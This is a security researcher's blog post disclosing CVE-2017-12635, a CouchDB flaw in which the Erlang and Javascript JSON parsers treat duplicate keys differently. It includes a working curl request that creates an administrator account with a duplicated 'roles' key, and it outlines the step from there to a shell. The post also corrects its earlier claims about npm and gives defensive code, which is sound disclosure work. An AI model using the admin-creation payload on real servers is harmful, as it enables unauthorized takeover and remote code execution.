There was a vulnerability in CouchDB caused by a discrepancy between the database’s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations.

[Update: an earlier version of this post said the main npm registry was vulnerable. I’m wrong, and the main npm registry is unaffected. See correction below. My bad!]

[CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)

### Background

Last time, I wrote about a deserialization bug leading to [code execution on rubygems.org](https://justi.cz/security/2017/10/07/rubygems-org-rce.html), a repository of dependencies for Ruby programs. The ability to inject malware into upstream project dependencies is a scary attack vector, and one from which I doubt most organizations are adequately protected.

With this in mind, I started searching for bugs in [registry.npmjs.org](https://registry.npmjs.org/), the server responsible for distributing npm packages. According to [their homepage](https://www.npmjs.com/), the npm registry serves more than 3 billion (!) package downloads per week.

### CouchDB

The npm registry uses CouchDB, which I hadn’t heard of before this project. The basic idea is that it’s a “NoSQL” database that makes data replication very easy. It’s sort of like a big key-value store for JSON blobs (“documents”), with features for data validation, querying, and user authentication, making it closer to a full-fledged database. CouchDB is written in Erlang, but allows users to specify document validation scripts in Javascript. These scripts are automatically evaluated when a document is created or updated. They start in a new process, and are passed JSON-serialized documents from the Erlang side.

CouchDB manages user accounts through a special database called `_users`.
When you create or modify a user in a CouchDB database (usually by doing a `PUT` to `/_users/org.couchdb.user:your_username`), the server checks your proposed change with a Javascript `validate_doc_update` function to ensure that you’re not, for example, attempting to make yourself an administrator.

### Vulnerability

The problem is that there is a discrepancy between the Javascript JSON parser (used in validation scripts) and the one used internally by CouchDB, called [jiffy](https://github.com/apache/couchdb-jiffy). Check out how each one deals with duplicate keys on an object like `{"foo":"bar", "foo":"baz"}`:

Erlang:

```
> jiffy:decode("{\"foo\":\"bar\", \"foo\":\"baz\"}").
{[{<<"foo">>,<<"bar">>},{<<"foo">>,<<"baz">>}]}
```

Javascript:

```
> JSON.parse("{\"foo\":\"bar\", \"foo\": \"baz\"}")
{foo: "baz"}
```

For a given key, the Erlang parser will store both values, but the Javascript parser will only store the last one. Unfortunately, the getter function for CouchDB’s internal representation of the data will only return the first value:

```
% Within couch_util:get_value
lists:keysearch(Key, 1, List).
```

And so, we can bypass all of the relevant input validation and create an admin user thusly:

```
curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:oops' --data-binary '{
  "type": "user",
  "name": "oops",
  "roles": ["_admin"],
  "roles": [],
  "password": "password"
}'
```

In Erlang land, we’ll see ourselves as having the `_admin` role, while in Javascript land we appear to have no special permissions. Fortunately for the attacker, almost all of the important logic concerning authentication and authorization, aside from the input validation script, occurs in the Erlang part of CouchDB.

Now that we have an administrator account, we have complete control of the database. Getting a shell from here is usually easy since CouchDB lets you define custom `query_server` languages through the admin interface, a feature which is basically just a wrapper around `execv`.
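To make the duplicate-key discrepancy in this section concrete, here is a minimal Javascript sketch of the two views of the same request body. The Erlang side is modeled by hand as an ordered list of pairs, and `getValue` is a hypothetical stand-in for the first-match lookup in `couch_util:get_value`; neither is CouchDB code.

```javascript
// The same document as in the curl example, with "roles" given twice.
const requestBody =
  '{"type":"user","name":"oops","roles":["_admin"],"roles":[],"password":"password"}';

// Javascript view: JSON.parse keeps only the last value of a duplicated key.
const jsView = JSON.parse(requestBody);

// Erlang view, written out by hand (an assumption for illustration):
// every key/value pair is kept, in document order.
const erlangView = [
  ["type", "user"],
  ["name", "oops"],
  ["roles", ["_admin"]],
  ["roles", []],
  ["password", "password"],
];

// Hypothetical stand-in for the first-match getter: return the value of the
// first pair whose key matches, or undefined if there is none.
function getValue(key, pairs) {
  const hit = pairs.find(([k]) => k === key);
  return hit === undefined ? undefined : hit[1];
}

console.log(jsView.roles);                  // []
console.log(getValue("roles", erlangView)); // [ '_admin' ]
```

The validation script only ever sees the first result, while the authorization logic acts on the second.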
One funny feature of this exploit is that it’s slightly tricky to detect through the web GUI; if you try to examine the user we just created through the admin console, the `roles` field will show up empty since it’s parsed in Javascript before being displayed!

### Impact on npm

I’ve been trying to figure out exactly how npm was affected by this bug. Since I didn’t actually exploit the vulnerability against any of npm’s production servers, I have to make educated guesses about which parts of the infrastructure were vulnerable to which parts of the attack, based on publicly available information.

Correction: it turns out that registry.npmjs.org simply exposes an identical API to the CouchDB user creation flow in order to maintain backwards compatibility with old clients. It has been using a custom authentication system since early 2015, and is therefore not vulnerable to my attack. The skim database mentioned below was affected by the bug, however. I apologize for being completely wrong in the initial version of this blog post!

Npm also exposes a “[skim database](https://skimdb.npmjs.com/)” which does look like it would have been vulnerable to the RCE part of the attack, but it’s unclear to me how that database is used in the infrastructure today. There’s a [blog post from 2014](http://blog.npmjs.org/post/75707294465/new-npm-registry-architecture) which indicates that all writes go to the skimdb, but I don’t know if this is still true.

### Conclusion

It’s probably a bad idea to use more than one parser to process the same data. If you have to, perhaps because your project uses multiple languages like in CouchDB, do your best to ensure that there aren’t any functional differences between the parsers like there were here. It’s unfortunate that the JSON standard [does not specify the behavior of duplicate keys](https://stackoverflow.com/questions/21832701/does-json-syntax-allow-duplicate-keys-in-an-object/21833017#21833017).
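One way to remove this kind of ambiguity is to reject documents with duplicate keys before either parser sees them. The sketch below is only an illustration of that idea, not a description of how CouchDB was actually fixed; `findDuplicateKey` is a hypothetical helper that leans on `JSON.parse` for validation and then scans the raw text for repeated keys within the same object.

```javascript
// Returns the first duplicated object key found in `text`, or null if none.
function findDuplicateKey(text) {
  JSON.parse(text); // throws on malformed input, so the scan can assume valid JSON
  const stack = []; // a Set of seen keys per open object, null per open array
  let i = 0;
  while (i < text.length) {
    const ch = text[i];
    if (ch === "{") { stack.push(new Set()); i++; }
    else if (ch === "[") { stack.push(null); i++; }
    else if (ch === "}" || ch === "]") { stack.pop(); i++; }
    else if (ch === '"') {
      // Find the closing quote, skipping over escaped characters.
      let j = i + 1;
      while (text[j] !== '"') j += text[j] === "\\" ? 2 : 1;
      // In valid JSON, a string followed by ":" is a key of the innermost object.
      let k = j + 1;
      while (k < text.length && /\s/.test(text[k])) k++;
      if (text[k] === ":") {
        const key = JSON.parse(text.slice(i, j + 1)); // normalizes escapes such as \u0066
        const seen = stack[stack.length - 1];
        if (seen.has(key)) return key;
        seen.add(key);
      }
      i = j + 1;
    } else {
      i++; // numbers, literals, commas, colons, whitespace
    }
  }
  return null;
}

const attackBody =
  '{"type":"user","name":"oops","roles":["_admin"],"roles":[],"password":"password"}';
console.log(findDuplicateKey(attackBody)); // roles
```

A server could refuse any request for which this returns a non-null key; the same key appearing in two different nested objects is not flagged, since that is unambiguous.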
Thanks to the CouchDB team for having a published security@ email address and working quickly to get this fixed.

### Shameless plug

If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider [joining Mastodon!](https://joinmastodon.org/) It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!